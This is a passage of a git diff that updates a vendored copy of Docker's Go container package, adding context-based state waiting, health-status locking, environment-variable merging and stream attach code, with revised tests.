+func (container *Container) GetMountPoints() []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + RW: m.RW, + }) + } + return mountPoints +} + +func (container *Container) ConfigsDirPath() string { + return filepath.Join(container.Root, "configs") +} + +// ConfigFilePath returns the path to the on-disk location of a config. +func (container *Container) ConfigFilePath(configRef swarmtypes.ConfigReference) string { + return filepath.Join(container.ConfigsDirPath(), configRef.ConfigID) +} diff --git a/vendor/github.com/docker/docker/container/env.go b/vendor/github.com/docker/docker/container/env.go new file mode 100644 index 0000000000..d225fd1471 --- /dev/null +++ b/vendor/github.com/docker/docker/container/env.go @@ -0,0 +1,43 @@ +package container // import "github.com/docker/docker/container" + +import ( + "strings" +) + +// ReplaceOrAppendEnvValues returns the defaults with the overrides either +// replaced by env key or appended to the list +func ReplaceOrAppendEnvValues(defaults, overrides []string) []string { + cache := make(map[string]int, len(defaults)) + for i, e := range defaults { + parts := strings.SplitN(e, "=", 2) + cache[parts[0]] = i + } + + for _, value := range overrides { + // Values w/o = means they want this env to be removed/unset. 
+ if !strings.Contains(value, "=") { + if i, exists := cache[value]; exists { + defaults[i] = "" // Used to indicate it should be removed + } + continue + } + + // Just do a normal set/update + parts := strings.SplitN(value, "=", 2) + if i, exists := cache[parts[0]]; exists { + defaults[i] = value + } else { + defaults = append(defaults, value) + } + } + + // Now remove all entries that we want to "unset" + for i := 0; i < len(defaults); i++ { + if defaults[i] == "" { + defaults = append(defaults[:i], defaults[i+1:]...) + i-- + } + } + + return defaults +} diff --git a/vendor/github.com/docker/docker/utils/utils_test.go b/vendor/github.com/docker/docker/container/env_test.go similarity index 56% rename from vendor/github.com/docker/docker/utils/utils_test.go rename to vendor/github.com/docker/docker/container/env_test.go index ab3911e8b3..77856284c2 100644 --- a/vendor/github.com/docker/docker/utils/utils_test.go +++ b/vendor/github.com/docker/docker/container/env_test.go @@ -1,14 +1,17 @@ -package utils +package container // import "github.com/docker/docker/container" import "testing" func TestReplaceAndAppendEnvVars(t *testing.T) { var ( - d = []string{"HOME=/"} - o = []string{"HOME=/root", "TERM=xterm"} + d = []string{"HOME=/", "FOO=foo_default"} + // remove FOO from env + // remove BAR from env (nop) + o = []string{"HOME=/root", "TERM=xterm", "FOO", "BAR"} ) env := ReplaceOrAppendEnvValues(d, o) + t.Logf("default=%v, override=%v, result=%v", d, o, env) if len(env) != 2 { t.Fatalf("expected len of 2 got %d", len(env)) } diff --git a/vendor/github.com/docker/docker/container/health.go b/vendor/github.com/docker/docker/container/health.go index 6e3cd12f3b..167ee9b476 100644 --- a/vendor/github.com/docker/docker/container/health.go +++ b/vendor/github.com/docker/docker/container/health.go @@ -1,35 +1,63 @@ -package container +package container // import "github.com/docker/docker/container" import ( - "github.com/Sirupsen/logrus" + "sync" + 
"github.com/docker/docker/api/types" + "github.com/sirupsen/logrus" ) // Health holds the current container health-check state type Health struct { types.Health stop chan struct{} // Write struct{} to stop the monitor + mu sync.Mutex } // String returns a human-readable description of the health-check state func (s *Health) String() string { - // This happens when the container is being shutdown and the monitor has stopped - // or the monitor has yet to be setup. - if s.stop == nil { - return types.Unhealthy - } + status := s.Status() - switch s.Status { + switch status { case types.Starting: return "health: starting" default: // Healthy and Unhealthy are clear on their own - return s.Status + return s.Health.Status } } -// OpenMonitorChannel creates and returns a new monitor channel. If there already is one, -// it returns nil. +// Status returns the current health status. +// +// Note that this takes a lock and the value may change after being read. +func (s *Health) Status() string { + s.mu.Lock() + defer s.mu.Unlock() + + // This happens when the monitor has yet to be setup. + if s.Health.Status == "" { + return types.Unhealthy + } + + return s.Health.Status +} + +// SetStatus writes the current status to the underlying health structure, +// obeying the locking semantics. +// +// Status may be set directly if another lock is used. +func (s *Health) SetStatus(new string) { + s.mu.Lock() + defer s.mu.Unlock() + + s.Health.Status = new +} + +// OpenMonitorChannel creates and returns a new monitor channel. If there +// already is one, it returns nil. func (s *Health) OpenMonitorChannel() chan struct{} { + s.mu.Lock() + defer s.mu.Unlock() + if s.stop == nil { logrus.Debug("OpenMonitorChannel") s.stop = make(chan struct{}) @@ -40,10 +68,15 @@ func (s *Health) OpenMonitorChannel() chan struct{} { // CloseMonitorChannel closes any existing monitor channel. 
func (s *Health) CloseMonitorChannel() { + s.mu.Lock() + defer s.mu.Unlock() + if s.stop != nil { logrus.Debug("CloseMonitorChannel: waiting for probe to stop") close(s.stop) s.stop = nil + // unhealthy when the monitor has stopped for compatibility reasons + s.Health.Status = types.Unhealthy logrus.Debug("CloseMonitorChannel done") } } diff --git a/vendor/github.com/docker/docker/container/history.go b/vendor/github.com/docker/docker/container/history.go index c80c2aa0cc..7117d9a437 100644 --- a/vendor/github.com/docker/docker/container/history.go +++ b/vendor/github.com/docker/docker/container/history.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" import "sort" diff --git a/vendor/github.com/docker/docker/container/memory_store.go b/vendor/github.com/docker/docker/container/memory_store.go index 706407a71c..ad4c9e20f6 100644 --- a/vendor/github.com/docker/docker/container/memory_store.go +++ b/vendor/github.com/docker/docker/container/memory_store.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" import ( "sync" diff --git a/vendor/github.com/docker/docker/container/memory_store_test.go b/vendor/github.com/docker/docker/container/memory_store_test.go index f81738fae1..09a8f27e07 100644 --- a/vendor/github.com/docker/docker/container/memory_store_test.go +++ b/vendor/github.com/docker/docker/container/memory_store_test.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" import ( "testing" @@ -62,7 +62,7 @@ func TestListContainers(t *testing.T) { t.Fatalf("expected list size 2, got %v", len(list)) } if list[0].ID != "id2" { - t.Fatalf("expected older container to be first, got %v", list[0].ID) + t.Fatalf("expected id2, got %v", list[0].ID) } } @@ -101,6 +101,6 @@ func TestApplyAllContainer(t *testing.T) { t.Fatal("expected container to not be nil") } if cont.ID != "newID" { - t.Fatalf("expected newID, got 
%v", cont) + t.Fatalf("expected newID, got %v", cont.ID) } } diff --git a/vendor/github.com/docker/docker/container/monitor.go b/vendor/github.com/docker/docker/container/monitor.go index f05e72b25f..1735e3487e 100644 --- a/vendor/github.com/docker/docker/container/monitor.go +++ b/vendor/github.com/docker/docker/container/monitor.go @@ -1,9 +1,9 @@ -package container +package container // import "github.com/docker/docker/container" import ( "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) const ( diff --git a/vendor/github.com/docker/docker/container/mounts_unix.go b/vendor/github.com/docker/docker/container/mounts_unix.go index c52abed2dc..62f4441dce 100644 --- a/vendor/github.com/docker/docker/container/mounts_unix.go +++ b/vendor/github.com/docker/docker/container/mounts_unix.go @@ -1,6 +1,6 @@ // +build !windows -package container +package container // import "github.com/docker/docker/container" // Mount contains information for a mount operation. type Mount struct { diff --git a/vendor/github.com/docker/docker/container/mounts_windows.go b/vendor/github.com/docker/docker/container/mounts_windows.go index 01b327f788..8f27e88067 100644 --- a/vendor/github.com/docker/docker/container/mounts_windows.go +++ b/vendor/github.com/docker/docker/container/mounts_windows.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" // Mount contains information for a mount operation. 
type Mount struct { diff --git a/vendor/github.com/docker/docker/container/state.go b/vendor/github.com/docker/docker/container/state.go index 4dd2ecec69..7c2a1ec81c 100644 --- a/vendor/github.com/docker/docker/container/state.go +++ b/vendor/github.com/docker/docker/container/state.go @@ -1,12 +1,12 @@ -package container +package container // import "github.com/docker/docker/container" import ( + "context" + "errors" "fmt" "sync" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/go-units" ) @@ -16,8 +16,10 @@ import ( // functions defined against State to run against Container. type State struct { sync.Mutex - // FIXME: Why do we have both paused and running if a - // container cannot be paused and running at the same time? + // Note that `Running` and `Paused` are not mutually exclusive: + // When pausing a container (on Linux), the cgroups freezer is used to suspend + // all processes in the container. Freezing the process requires the process to + // be running. As a result, paused containers are both `Running` _and_ `Paused`. Running bool Paused bool Restarting bool @@ -26,43 +28,40 @@ type State struct { Dead bool Pid int ExitCodeValue int `json:"ExitCode"` - ErrorMsg string `json:"Error"` // contains last known error when starting the container + ErrorMsg string `json:"Error"` // contains last known error during container start, stop, or remove StartedAt time.Time FinishedAt time.Time - waitChan chan struct{} Health *Health + + waitStop chan struct{} + waitRemove chan struct{} } -// StateStatus is used to return an error type implementing both -// exec.ExitCode and error. +// StateStatus is used to return container wait results. +// Implements exec.ExitCode interface. // This type is needed as State include a sync.Mutex field which make // copying it unsafe. 
type StateStatus struct { exitCode int - error string -} - -func newStateStatus(ec int, err string) *StateStatus { - return &StateStatus{ - exitCode: ec, - error: err, - } + err error } // ExitCode returns current exitcode for the state. -func (ss *StateStatus) ExitCode() int { - return ss.exitCode +func (s StateStatus) ExitCode() int { + return s.exitCode } -// Error returns current error for the state. -func (ss *StateStatus) Error() string { - return ss.error +// Err returns current error for the state. Returns nil if the container had +// exited on its own. +func (s StateStatus) Err() error { + return s.err } // NewState creates a default state object with a fresh channel for state changes. func NewState() *State { return &State{ - waitChan: make(chan struct{}), + waitStop: make(chan struct{}), + waitRemove: make(chan struct{}), } } @@ -102,15 +101,6 @@ func (s *State) String() string { return fmt.Sprintf("Exited (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt))) } -// HealthString returns a single string to describe health status. -func (s *State) HealthString() string { - if s.Health == nil { - return types.NoHealthcheck - } - - return s.Health.String() -} - // IsValidHealthString checks if the provided string is a valid container health status or not. func IsValidHealthString(s string) bool { return s == types.Starting || @@ -160,66 +150,89 @@ func IsValidStateString(s string) bool { return true } -func wait(waitChan <-chan struct{}, timeout time.Duration) error { - if timeout < 0 { - <-waitChan - return nil - } - select { - case <-time.After(timeout): - return fmt.Errorf("Timed out: %v", timeout) - case <-waitChan: - return nil - } -} +// WaitCondition is an enum type for different states to wait for. +type WaitCondition int + +// Possible WaitCondition Values. +// +// WaitConditionNotRunning (default) is used to wait for any of the non-running +// states: "created", "exited", "dead", "removing", or "removed". 
+// +// WaitConditionNextExit is used to wait for the next time the state changes +// to a non-running state. If the state is currently "created" or "exited", +// this would cause Wait() to block until either the container runs and exits +// or is removed. +// +// WaitConditionRemoved is used to wait for the container to be removed. +const ( + WaitConditionNotRunning WaitCondition = iota + WaitConditionNextExit + WaitConditionRemoved +) -// WaitStop waits until state is stopped. If state already stopped it returns -// immediately. If you want wait forever you must supply negative timeout. -// Returns exit code, that was passed to SetStopped -func (s *State) WaitStop(timeout time.Duration) (int, error) { - s.Lock() - if !s.Running { - exitCode := s.ExitCodeValue - s.Unlock() - return exitCode, nil - } - waitChan := s.waitChan - s.Unlock() - if err := wait(waitChan, timeout); err != nil { - return -1, err - } +// Wait waits until the container is in a certain state indicated by the given +// condition. A context must be used for cancelling the request, controlling +// timeouts, and avoiding goroutine leaks. Wait must be called without holding +// the state lock. Returns a channel from which the caller will receive the +// result. If the container exited on its own, the result's Err() method will +// be nil and its ExitCode() method will return the container's exit code, +// otherwise, the results Err() method will return an error indicating why the +// wait operation failed. +func (s *State) Wait(ctx context.Context, condition WaitCondition) <-chan StateStatus { s.Lock() defer s.Unlock() - return s.ExitCode(), nil -} -// WaitWithContext waits for the container to stop. Optional context can be -// passed for canceling the request. 
-func (s *State) WaitWithContext(ctx context.Context) error { - // todo(tonistiigi): make other wait functions use this - s.Lock() - if !s.Running { - state := newStateStatus(s.ExitCode(), s.Error()) - defer s.Unlock() - if state.ExitCode() == 0 { - return nil + if condition == WaitConditionNotRunning && !s.Running { + // Buffer so we can put it in the channel now. + resultC := make(chan StateStatus, 1) + + // Send the current status. + resultC <- StateStatus{ + exitCode: s.ExitCode(), + err: s.Err(), } - return state + + return resultC } - waitChan := s.waitChan - s.Unlock() - select { - case <-waitChan: + + // If we are waiting only for removal, the waitStop channel should + // remain nil and block forever. + var waitStop chan struct{} + if condition < WaitConditionRemoved { + waitStop = s.waitStop + } + + // Always wait for removal, just in case the container gets removed + // while it is still in a "created" state, in which case it is never + // actually stopped. + waitRemove := s.waitRemove + + resultC := make(chan StateStatus) + + go func() { + select { + case <-ctx.Done(): + // Context timeout or cancellation. + resultC <- StateStatus{ + exitCode: -1, + err: ctx.Err(), + } + return + case <-waitStop: + case <-waitRemove: + } + s.Lock() - state := newStateStatus(s.ExitCode(), s.Error()) - s.Unlock() - if state.ExitCode() == 0 { - return nil + result := StateStatus{ + exitCode: s.ExitCode(), + err: s.Err(), } - return state - case <-ctx.Done(): - return ctx.Err() - } + s.Unlock() + + resultC <- result + }() + + return resultC } // IsRunning returns whether the running flag is set. Used by Container to check whether a container is running. @@ -253,8 +266,12 @@ func (s *State) SetExitCode(ec int) { // SetRunning sets the state of the container to "running". 
func (s *State) SetRunning(pid int, initial bool) { s.ErrorMsg = "" + s.Paused = false s.Running = true s.Restarting = false + if initial { + s.Paused = false + } s.ExitCodeValue = 0 s.Pid = pid if initial { @@ -268,10 +285,15 @@ func (s *State) SetStopped(exitStatus *ExitStatus) { s.Paused = false s.Restarting = false s.Pid = 0 - s.FinishedAt = time.Now().UTC() - s.setFromExitStatus(exitStatus) - close(s.waitChan) // fire waiters for stop - s.waitChan = make(chan struct{}) + if exitStatus.ExitedAt.IsZero() { + s.FinishedAt = time.Now().UTC() + } else { + s.FinishedAt = exitStatus.ExitedAt + } + s.ExitCodeValue = exitStatus.ExitCode + s.OOMKilled = exitStatus.OOMKilled + close(s.waitStop) // fire waiters for stop + s.waitStop = make(chan struct{}) } // SetRestarting sets the container state to "restarting" without locking. @@ -281,18 +303,23 @@ func (s *State) SetRestarting(exitStatus *ExitStatus) { // all the checks in docker around rm/stop/etc s.Running = true s.Restarting = true + s.Paused = false s.Pid = 0 s.FinishedAt = time.Now().UTC() - s.setFromExitStatus(exitStatus) - close(s.waitChan) // fire waiters for stop - s.waitChan = make(chan struct{}) + s.ExitCodeValue = exitStatus.ExitCode + s.OOMKilled = exitStatus.OOMKilled + close(s.waitStop) // fire waiters for stop + s.waitStop = make(chan struct{}) } // SetError sets the container's error state. This is useful when we want to // know the error that occurred when container transits to another state // when inspecting it func (s *State) SetError(err error) { - s.ErrorMsg = err.Error() + s.ErrorMsg = "" + if err != nil { + s.ErrorMsg = err.Error() + } } // IsPaused returns whether the container is paused or not. @@ -330,6 +357,15 @@ func (s *State) ResetRemovalInProgress() { s.Unlock() } +// IsRemovalInProgress returns whether the RemovalInProgress flag is set. +// Used by Container to check whether a container is being removed. 
+func (s *State) IsRemovalInProgress() bool { + s.Lock() + res := s.RemovalInProgress + s.Unlock() + return res +} + // SetDead sets the container state to "dead" func (s *State) SetDead() { s.Lock() @@ -337,7 +373,37 @@ func (s *State) SetDead() { s.Unlock() } -// Error returns current error for the state. -func (s *State) Error() string { - return s.ErrorMsg +// IsDead returns whether the Dead flag is set. Used by Container to check whether a container is dead. +func (s *State) IsDead() bool { + s.Lock() + res := s.Dead + s.Unlock() + return res +} + +// SetRemoved assumes this container is already in the "dead" state and +// closes the internal waitRemove channel to unblock callers waiting for a +// container to be removed. +func (s *State) SetRemoved() { + s.SetRemovalError(nil) +} + +// SetRemovalError is to be called in case a container remove failed. +// It sets an error and closes the internal waitRemove channel to unblock +// callers waiting for the container to be removed. +func (s *State) SetRemovalError(err error) { + s.SetError(err) + s.Lock() + close(s.waitRemove) // Unblock those waiting on remove. + // Recreate the channel so next ContainerWait will work + s.waitRemove = make(chan struct{}) + s.Unlock() +} + +// Err returns an error if there is one. +func (s *State) Err() error { + if s.ErrorMsg != "" { + return errors.New(s.ErrorMsg) + } + return nil } diff --git a/vendor/github.com/docker/docker/container/state_solaris.go b/vendor/github.com/docker/docker/container/state_solaris.go deleted file mode 100644 index 1229650efa..0000000000 --- a/vendor/github.com/docker/docker/container/state_solaris.go +++ /dev/null @@ -1,7 +0,0 @@ -package container - -// setFromExitStatus is a platform specific helper function to set the state -// based on the ExitStatus structure. 
-func (s *State) setFromExitStatus(exitStatus *ExitStatus) { - s.ExitCodeValue = exitStatus.ExitCode -} diff --git a/vendor/github.com/docker/docker/container/state_test.go b/vendor/github.com/docker/docker/container/state_test.go index c9a7bb4b7b..4ad3c805ed 100644 --- a/vendor/github.com/docker/docker/container/state_test.go +++ b/vendor/github.com/docker/docker/container/state_test.go @@ -1,7 +1,7 @@ -package container +package container // import "github.com/docker/docker/container" import ( - "sync/atomic" + "context" "testing" "time" @@ -30,31 +30,63 @@ func TestIsValidHealthString(t *testing.T) { func TestStateRunStop(t *testing.T) { s := NewState() - for i := 1; i < 3; i++ { // full lifecycle two times + + // Begin another wait with WaitConditionRemoved. It should complete + // within 200 milliseconds. + ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond) + defer cancel() + removalWait := s.Wait(ctx, WaitConditionRemoved) + + // Full lifecycle two times. + for i := 1; i <= 2; i++ { + // A wait with WaitConditionNotRunning should return + // immediately since the state is now either "created" (on the + // first iteration) or "exited" (on the second iteration). It + // shouldn't take more than 50 milliseconds. + ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond) + defer cancel() + // Expectx exit code to be i-1 since it should be the exit + // code from the previous loop or 0 for the created state. + if status := <-s.Wait(ctx, WaitConditionNotRunning); status.ExitCode() != i-1 { + t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i-1, status.Err()) + } + + // A wait with WaitConditionNextExit should block until the + // container has started and exited. It shouldn't take more + // than 100 milliseconds. + ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + initialWait := s.Wait(ctx, WaitConditionNextExit) + + // Set the state to "Running". 
s.Lock() - s.SetRunning(i+100, false) + s.SetRunning(i, true) s.Unlock() + // Assert desired state. if !s.IsRunning() { t.Fatal("State not running") } - if s.Pid != i+100 { - t.Fatalf("Pid %v, expected %v", s.Pid, i+100) + if s.Pid != i { + t.Fatalf("Pid %v, expected %v", s.Pid, i) } if s.ExitCode() != 0 { t.Fatalf("ExitCode %v, expected 0", s.ExitCode()) } - stopped := make(chan struct{}) - var exit int64 - go func() { - exitCode, _ := s.WaitStop(-1 * time.Second) - atomic.StoreInt64(&exit, int64(exitCode)) - close(stopped) - }() + // Now that it's running, a wait with WaitConditionNotRunning + // should block until we stop the container. It shouldn't take + // more than 100 milliseconds. + ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + exitWait := s.Wait(ctx, WaitConditionNotRunning) + + // Set the state to "Exited". s.Lock() s.SetStopped(&ExitStatus{ExitCode: i}) s.Unlock() + + // Assert desired state. if s.IsRunning() { t.Fatal("State is running") } @@ -64,50 +96,97 @@ func TestStateRunStop(t *testing.T) { if s.Pid != 0 { t.Fatalf("Pid %v, expected 0", s.Pid) } - select { - case <-time.After(100 * time.Millisecond): - t.Fatal("Stop callback doesn't fire in 100 milliseconds") - case <-stopped: - t.Log("Stop callback fired") - } - exitCode := int(atomic.LoadInt64(&exit)) - if exitCode != i { - t.Fatalf("ExitCode %v, expected %v", exitCode, i) + + // Receive the initialWait result. + if status := <-initialWait; status.ExitCode() != i { + t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i, status.Err()) } - if exitCode, err := s.WaitStop(-1 * time.Second); err != nil || exitCode != i { - t.Fatalf("WaitStop returned exitCode: %v, err: %v, expected exitCode: %v, err: %v", exitCode, err, i, nil) + + // Receive the exitWait result. 
+ if status := <-exitWait; status.ExitCode() != i { + t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i, status.Err()) } } + + // Set the state to dead and removed. + s.SetDead() + s.SetRemoved() + + // Wait for removed status or timeout. + if status := <-removalWait; status.ExitCode() != 2 { + // Should have the final exit code from the loop. + t.Fatalf("Removal wait exitCode %v, expected %v, err %q", status.ExitCode(), 2, status.Err()) + } } func TestStateTimeoutWait(t *testing.T) { s := NewState() - stopped := make(chan struct{}) - go func() { - s.WaitStop(100 * time.Millisecond) - close(stopped) - }() + + s.Lock() + s.SetRunning(0, true) + s.Unlock() + + // Start a wait with a timeout. + ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + waitC := s.Wait(ctx, WaitConditionNotRunning) + + // It should timeout *before* this 200ms timer does. select { case <-time.After(200 * time.Millisecond): t.Fatal("Stop callback doesn't fire in 200 milliseconds") - case <-stopped: + case status := <-waitC: t.Log("Stop callback fired") + // Should be a timeout error. + if status.Err() == nil { + t.Fatal("expected timeout error, got nil") + } + if status.ExitCode() != -1 { + t.Fatalf("expected exit code %v, got %v", -1, status.ExitCode()) + } } s.Lock() - s.SetStopped(&ExitStatus{ExitCode: 1}) + s.SetStopped(&ExitStatus{ExitCode: 0}) s.Unlock() - stopped = make(chan struct{}) - go func() { - s.WaitStop(100 * time.Millisecond) - close(stopped) - }() + // Start another wait with a timeout. This one should return + // immediately. 
+ ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + waitC = s.Wait(ctx, WaitConditionNotRunning) + select { case <-time.After(200 * time.Millisecond): - t.Fatal("Stop callback doesn't fire in 100 milliseconds") - case <-stopped: + t.Fatal("Stop callback doesn't fire in 200 milliseconds") + case status := <-waitC: t.Log("Stop callback fired") + if status.ExitCode() != 0 { + t.Fatalf("expected exit code %v, got %v, err %q", 0, status.ExitCode(), status.Err()) + } } +} +func TestIsValidStateString(t *testing.T) { + states := []struct { + state string + expected bool + }{ + {"paused", true}, + {"restarting", true}, + {"running", true}, + {"dead", true}, + {"start", false}, + {"created", true}, + {"exited", true}, + {"removing", true}, + {"stop", false}, + } + + for _, s := range states { + v := IsValidStateString(s.state) + if v != s.expected { + t.Fatalf("Expected %t, but got %t", s.expected, v) + } + } } diff --git a/vendor/github.com/docker/docker/container/state_unix.go b/vendor/github.com/docker/docker/container/state_unix.go deleted file mode 100644 index a2fa5afc28..0000000000 --- a/vendor/github.com/docker/docker/container/state_unix.go +++ /dev/null @@ -1,10 +0,0 @@ -// +build linux freebsd - -package container - -// setFromExitStatus is a platform specific helper function to set the state -// based on the ExitStatus structure. -func (s *State) setFromExitStatus(exitStatus *ExitStatus) { - s.ExitCodeValue = exitStatus.ExitCode - s.OOMKilled = exitStatus.OOMKilled -} diff --git a/vendor/github.com/docker/docker/container/state_windows.go b/vendor/github.com/docker/docker/container/state_windows.go deleted file mode 100644 index 1229650efa..0000000000 --- a/vendor/github.com/docker/docker/container/state_windows.go +++ /dev/null @@ -1,7 +0,0 @@ -package container - -// setFromExitStatus is a platform specific helper function to set the state -// based on the ExitStatus structure. 
-func (s *State) setFromExitStatus(exitStatus *ExitStatus) { - s.ExitCodeValue = exitStatus.ExitCode -} diff --git a/vendor/github.com/docker/docker/container/store.go b/vendor/github.com/docker/docker/container/store.go index 042fb1a349..3af0389856 100644 --- a/vendor/github.com/docker/docker/container/store.go +++ b/vendor/github.com/docker/docker/container/store.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" // StoreFilter defines a function to filter // container in the store. diff --git a/vendor/github.com/docker/docker/container/stream/attach.go b/vendor/github.com/docker/docker/container/stream/attach.go new file mode 100644 index 0000000000..1366dcb499 --- /dev/null +++ b/vendor/github.com/docker/docker/container/stream/attach.go @@ -0,0 +1,175 @@ +package stream // import "github.com/docker/docker/container/stream" + +import ( + "context" + "io" + + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/term" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sync/errgroup" +) + +var defaultEscapeSequence = []byte{16, 17} // ctrl-p, ctrl-q + +// AttachConfig is the config struct used to attach a client to a stream's stdio +type AttachConfig struct { + // Tells the attach copier that the stream's stdin is a TTY and to look for + // escape sequences in stdin to detach from the stream. + // When true the escape sequence is not passed to the underlying stream + TTY bool + // Specifies the detach keys the client will be using + // Only useful when `TTY` is true + DetachKeys []byte + + // CloseStdin signals that once done, stdin for the attached stream should be closed + // For example, this would close the attached container's stdin. + CloseStdin bool + + // UseStd* indicate whether the client has requested to be connected to the + // given stream or not. These flags are used instead of checking Std* != nil + // at points before the client streams Std* are wired up. 
+ UseStdin, UseStdout, UseStderr bool + + // CStd* are the streams directly connected to the container + CStdin io.WriteCloser + CStdout, CStderr io.ReadCloser + + // Provide client streams to wire up to + Stdin io.ReadCloser + Stdout, Stderr io.Writer +} + +// AttachStreams attaches the container's streams to the AttachConfig +func (c *Config) AttachStreams(cfg *AttachConfig) { + if cfg.UseStdin { + cfg.CStdin = c.StdinPipe() + } + + if cfg.UseStdout { + cfg.CStdout = c.StdoutPipe() + } + + if cfg.UseStderr { + cfg.CStderr = c.StderrPipe() + } +} + +// CopyStreams starts goroutines to copy data in and out to/from the container +func (c *Config) CopyStreams(ctx context.Context, cfg *AttachConfig) <-chan error { + var group errgroup.Group + + // Connect stdin of container to the attach stdin stream. + if cfg.Stdin != nil { + group.Go(func() error { + logrus.Debug("attach: stdin: begin") + defer logrus.Debug("attach: stdin: end") + + defer func() { + if cfg.CloseStdin && !cfg.TTY { + cfg.CStdin.Close() + } else { + // No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr + if cfg.CStdout != nil { + cfg.CStdout.Close() + } + if cfg.CStderr != nil { + cfg.CStderr.Close() + } + } + }() + + var err error + if cfg.TTY { + _, err = copyEscapable(cfg.CStdin, cfg.Stdin, cfg.DetachKeys) + } else { + _, err = pools.Copy(cfg.CStdin, cfg.Stdin) + } + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.WithError(err).Debug("error on attach stdin") + return errors.Wrap(err, "error on attach stdin") + } + return nil + }) + } + + attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) error { + logrus.Debugf("attach: %s: begin", name) + defer logrus.Debugf("attach: %s: end", name) + defer func() { + // Make sure stdin gets closed + if cfg.Stdin != nil { + cfg.Stdin.Close() + } + streamPipe.Close() + }() + + _, err := pools.Copy(stream, streamPipe) + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + 
logrus.WithError(err).Debugf("attach: %s", name) + return errors.Wrapf(err, "error attaching %s stream", name) + } + return nil + } + + if cfg.Stdout != nil { + group.Go(func() error { + return attachStream("stdout", cfg.Stdout, cfg.CStdout) + }) + } + if cfg.Stderr != nil { + group.Go(func() error { + return attachStream("stderr", cfg.Stderr, cfg.CStderr) + }) + } + + errs := make(chan error, 1) + go func() { + defer logrus.Debug("attach done") + groupErr := make(chan error, 1) + go func() { + groupErr <- group.Wait() + }() + select { + case <-ctx.Done(): + // close all pipes + if cfg.CStdin != nil { + cfg.CStdin.Close() + } + if cfg.CStdout != nil { + cfg.CStdout.Close() + } + if cfg.CStderr != nil { + cfg.CStderr.Close() + } + + // Now with these closed, wait should return. + if err := group.Wait(); err != nil { + errs <- err + return + } + errs <- ctx.Err() + case err := <-groupErr: + errs <- err + } + }() + + return errs +} + +func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) { + if len(keys) == 0 { + keys = defaultEscapeSequence + } + pr := term.NewEscapeProxy(src, keys) + defer src.Close() + + return pools.Copy(dst, pr) +} diff --git a/vendor/github.com/docker/docker/container/stream/streams.go b/vendor/github.com/docker/docker/container/stream/streams.go index 79f366afda..d81867c1da 100644 --- a/vendor/github.com/docker/docker/container/stream/streams.go +++ b/vendor/github.com/docker/docker/container/stream/streams.go @@ -1,4 +1,4 @@ -package stream +package stream // import "github.com/docker/docker/container/stream" import ( "fmt" @@ -7,11 +7,11 @@ import ( "strings" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/libcontainerd" + "github.com/containerd/containerd/cio" "github.com/docker/docker/pkg/broadcaster" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/pools" + "github.com/sirupsen/logrus" ) // Config holds information about I/O streams managed together. 
@@ -62,6 +62,7 @@ func (c *Config) StdinPipe() io.WriteCloser { // StdoutPipe creates a new io.ReadCloser with an empty bytes pipe. // It adds this new out pipe to the Stdout broadcaster. +// This will block stdout if unconsumed. func (c *Config) StdoutPipe() io.ReadCloser { bytesPipe := ioutils.NewBytesPipe() c.stdout.Add(bytesPipe) @@ -70,6 +71,7 @@ func (c *Config) StdoutPipe() io.ReadCloser { // StderrPipe creates a new io.ReadCloser with an empty bytes pipe. // It adds this new err pipe to the Stderr broadcaster. +// This will block stderr if unconsumed. func (c *Config) StderrPipe() io.ReadCloser { bytesPipe := ioutils.NewBytesPipe() c.stderr.Add(bytesPipe) @@ -112,13 +114,14 @@ func (c *Config) CloseStreams() error { } // CopyToPipe connects streamconfig with a libcontainerd.IOPipe -func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) { - copyFunc := func(w io.Writer, r io.Reader) { +func (c *Config) CopyToPipe(iop *cio.DirectIO) { + copyFunc := func(w io.Writer, r io.ReadCloser) { c.Add(1) go func() { if _, err := pools.Copy(w, r); err != nil { - logrus.Errorf("stream copy error: %+v", err) + logrus.Errorf("stream copy error: %v", err) } + r.Close() c.Done() }() } @@ -135,7 +138,7 @@ func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) { go func() { pools.Copy(iop.Stdin, stdin) if err := iop.Stdin.Close(); err != nil { - logrus.Warnf("failed to close stdin: %+v", err) + logrus.Warnf("failed to close stdin: %v", err) } }() } diff --git a/vendor/github.com/docker/docker/container/view.go b/vendor/github.com/docker/docker/container/view.go new file mode 100644 index 0000000000..b631499412 --- /dev/null +++ b/vendor/github.com/docker/docker/container/view.go @@ -0,0 +1,494 @@ +package container // import "github.com/docker/docker/container" + +import ( + "errors" + "fmt" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "github.com/docker/go-connections/nat" + 